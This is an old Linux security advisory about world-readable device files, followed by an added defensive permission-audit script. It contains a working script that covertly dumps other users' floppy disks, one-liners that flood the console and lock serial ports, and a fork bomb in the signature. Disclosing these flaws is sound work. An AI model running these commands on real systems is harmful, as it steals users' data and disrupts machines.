First one
----------

Any user can read data from an (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user may write a
script which periodically checks if the floppy has just been unmounted, then
dumps its content to a file. Here's a sample 'floppy collector':

-- fdumper --
#!/bin/sh

DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1

while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=LABEL+1
      DUMPED=1
    fi
  else
    DUMPED=0
  fi
done
-- eof --

Also, if there's no floppy in the drive, an unprivileged user may flood the
kernel log console (local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged to
/var/log/messages AND to the console (default klogd behaviour). Also, every
printk(...) (called by the fd driver) uses sync() to flush buffers. It will
cause abnormal hdd activity.

Second one
-----------

(not tested with rh 5.0)

Ordinary users are allowed to read /dev/ttyS*. The serial port driver
disallows multiple access attempts at the same time, so a user may permanently
lock a chosen port using this command:

[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now the serial port is in an unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, e.g. /dev/sequencer,
which are world-readable or even world-writable. There isn't ANY reason to
give ordinary users direct access to hardware devices. It's quite easy (as
shown above ;) to obtain interesting data or cause system failure by
reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
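
The audit suggested under "Solution..." can be made a little more precise. The following is an added example, not part of the original post: it reads `ls -l` output and reports block and character device nodes whose "other" bits allow read or write. The sample listing, its modes and the pseudo-device allowlist are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit `ls -l` output for
# block/char device nodes that "other" users can read or write.

# Constructed sample listing; modes and dates are illustrative only.
sample_listing() {
cat <<'EOF'
brw-rw-r--   1 root floppy   2,  28 May  5  1998 /dev/fd0H1440
brw-rw----   1 root floppy   2,   0 May  5  1998 /dev/fd0
crw-rw-r--   1 root uucp     4,  64 May  5  1998 /dev/ttyS0
crw-rw-rw-   1 root sys     14,   1 May  5  1998 /dev/sequencer
crw-rw-rw-   1 root root     1,   3 May  5  1998 /dev/null
-rw-r--r--   1 root root          0 May  5  1998 /dev/README
EOF
}

# Reads `ls -l` lines on stdin; prints "<finding> TAB <mode> TAB <name>".
audit_dev_perms() {
    awk '
    # Pseudo-devices that must stay world-accessible (assumed allowlist).
    $NF ~ /^(\/dev\/)?(null|zero|full|random|urandom|tty|ptmx)$/ { next }
    # Only block (b) and character (c) device nodes are of interest.
    $1 ~ /^[bc]/ {
        r = (substr($1, 8, 1) == "r")   # other-read bit
        w = (substr($1, 9, 1) == "w")   # other-write bit
        if (r && w)  what = "world-read/write"
        else if (r)  what = "world-readable"
        else if (w)  what = "world-writable"
        else         next
        printf "%s\t%s\t%s\n", what, $1, $NF
    }'
}

# Demo on the constructed listing; on a live host: ls -l /dev/* | audit_dev_perms
sample_listing | audit_dev_perms
```

Unlike `grep "r-- "`, which only matches nodes that are read-only for others, this also reports nodes with `rw-` in the last permission triplet.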